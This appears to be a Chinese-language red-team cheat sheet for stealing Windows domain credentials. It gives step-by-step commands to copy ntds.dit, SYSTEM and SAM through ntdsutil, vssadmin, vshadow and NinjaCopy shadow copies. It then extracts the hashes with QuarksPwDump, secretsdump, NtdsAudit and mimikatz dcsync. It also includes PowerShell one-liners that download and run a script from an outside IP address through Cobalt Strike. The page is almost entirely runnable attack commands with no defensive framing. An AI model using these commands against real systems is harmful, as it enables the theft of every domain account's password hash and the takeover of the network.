windows 域内密码凭证获取

windows\NTDS\ntds.dit
windows\system32\config\system
windows\system32\config\security

ntds.dit：活动目录数据库，包括有关域用户、组和组成员身份的信息。它还包括域中所有用户的密码哈希值。
为了保护密码哈希值，使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。因此想要破解工作组sam文件与ntds.dit文件都需要拥有一个system文件
AD DS数据存储：
• 由 ntds.dit 文件构成
• 默认存储在所有域控制器上的 %SystemRoot%\NTDS 文件夹中
• 只能通过域控制器进程和协议访问

由于Windows阻止对这些文件的标准读取或复制操作，因此必须使用特殊技术来获取副本。
PID：4的system进程

Volume Shadow Copy Service 是微软从 Windows XP 开始提供的用于创建一致性的时间点副本（也就是快照）的服务框架。
使用快照把ntds.dit和system文件

使用Ntdsutil.exe：一个为 Active Directory 提供管理设施的命令行工具，域环境默认安装。

快照中的
windows\NTDS\ntds.dit
windows\system32\config\system
ntdstuil方式
• 交互式
ntdsutil
snapshot
activate instance ntds
create
mount [GUID]
unmout [GUID] //copy 完之后再执行卸载
del [GUID]
quit
quit
非交互

1. 查询当前系统的快照
   ntdsutil snapshot “List All” quit quit
   ntdsutil snapshot “List Mounted” quit quit
2. 创建快照
   ntdsutil snapshot “activate instance ntds” create quit quit
   调用Volume Shadow Copy服务会产生日志文件，位于System下，Event ID为7036
   执行ntdsutil snapshot “activate instance ntds” create quit quit会额外产生Event ID为98的日志文件
3. 挂载快照
   ntdsutil snapshot “mount {daee5123-b284-47fe-b02e-6e67e8d80fb1}” quit quit
4. 复制ntds.dit
   copy C:$SNAP_202008271744_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds2.dit
   copy C:$SNAP_202008271744_VOLUMEC$\windows\system32\config\system c:\system
5. 卸载快照
   ntdsutil snapshot “unmount {daee5123-b284-47fe-b02e-6e67e8d80fb1}” quit quit
6. 删除快照
   ntdsutil snapshot “delete {daee5123-b284-47fe-b02e-6e67e8d80fb1}” quit quit

• 交互式
ntdsutil
activate instance ntds
ifm
create full :
quit
quit
• 非交互
ntdsutil “activate instance ntds” ifm “create full C:\ntds” quit quit

vssadmin 方式 sam.hiv system.hiv ntds.dit
VssAdmin：是Windows系统提供的卷影复制服务(VSS)的管理工具，域环境默认安装。
• 用于创建或删除卷影副本，列出卷影副本的信息
• 用于显示所有安装的所有卷影副本写入程序和提供程序
• 改变卷影副本存储空间的大小等

1. 查询当前系统的快照
   vssadmin list shadows
2. 创建快照
   vssadmin create shadow /for=c:
3. 获得Shadow Copy Volume Name
   \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10
   无法直接访问 ?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12 中的文件
   可通过创建符号链接访问快照中的文件：
   mklink /d c:\testvsc \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12
   删除符号链接：
   rd c:\testvsc
4. 复制ntds.dit
   copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\NTDS\ntds.dit c:\ntds3.dit
5. 删除快照
   vssadmin delete shadows /for=c: /quiet

vshadow方式
Vshadow：是一个简单的指令行工具，它允许任何人创建卷影拷贝。系统默认不支持，可在Microsoft
Windows Software Development Kit (SDK)中获得该工具。

1. 查询当前系统的快照
   vshadow.exe -q

2. 创建快照
   vshadow.exe -p -nw C:
   参数说明：
   -p persistent，备份操作或是重启系统不会删除
   -nw no writers，用来提高创建速度
   C: 对应c盘
   获得SnapshotSetID、SnapshotID、Shadow copy
   device name
   

3. 复制ntds.dit
   copy [Shadow copy device name]\windows\ntds\ntds.dit c:\ntds.dit
   无法直接访问 ?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12 中的文件
   可通过创建符号链接访问快照中的文件：
   mklink /d c:\testvsc \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12
   删除符号链接：
   rd c:\testvsc

4. 删除快照
   vshadow -dx=ShadowCopySetId
   vshadow -ds=ShadowCopyId

NinjaCopy
cobaltstrike 加载脚本 Import-Module .\invoke-NinjaCopy.ps1
powershell Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive
Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination .\system.hive
Invoke-NinjaCopy -Path C:\windows\ntds\ntds.dit -LocalDestination .\ntds.dit

#远程加载
powershell.exe IEX (New-Object Net.WebClient).DownloadString(‘http://39.108.68.207:8000/Invoke-
NinjaCopy.ps1’);Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination
c:\sam1.hive
powershell.exe IEX (New-Object Net.WebClient).DownloadString(‘http://39.108.68.207:8000/Invoke-
NinjaCopy.ps1’);Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination
c:\system1.hive
powershell.exe IEX (New-Object Net.WebClient).DownloadString(‘http://39.108.68.207:8000/Invoke-
NinjaCopy.ps1’);Invoke-NinjaCopy -Path C:\Windows\ntds\ntds.dit -LocalDestination c:\ntds1.dit

解密

1QuarkPwDump

1. 修复复制出来的数据库文件 esentutl /p /o ntds.dit
2. 使用QuarksPwDump直接读取信息并将结果导出至文件
   QuarksPwDump.exe --dump-hash-domain --output zyl.com.txt --ntds-file ntds.dit

2Secretsdump
impacket 套件中的 secretsdump.py 脚本解密，速度有点慢
secretsdump.exe -sam sam.hiv -security security.hiv -system system.hiv LOCAL
secretsdump.exe -system system.hiv -ntds ntds.dit LOCAL

3ntdsAudit
可以十分高效的破解ntds文件并将全部域用户信息导出方便查找域用户状态。
将ntds.dit文件和SYSTEM文件放在同一目录下执行命令
NtdsAudit.exe “ntds.dit” -s “system.hive” -p pwdump.txt --users-csv users.csv

4cs中使用mimikatz
查询域内所有用户的hash
mimikatz lsadump::dcsync /domain:de1ay.com /all /csv
获取单个用户的详细信息
mimikatz lsadump::dcsync /domain:de1ay.com /user:krbtgt
查看所有用户的所有详细信息
mimikatz lsadump::lsa /inject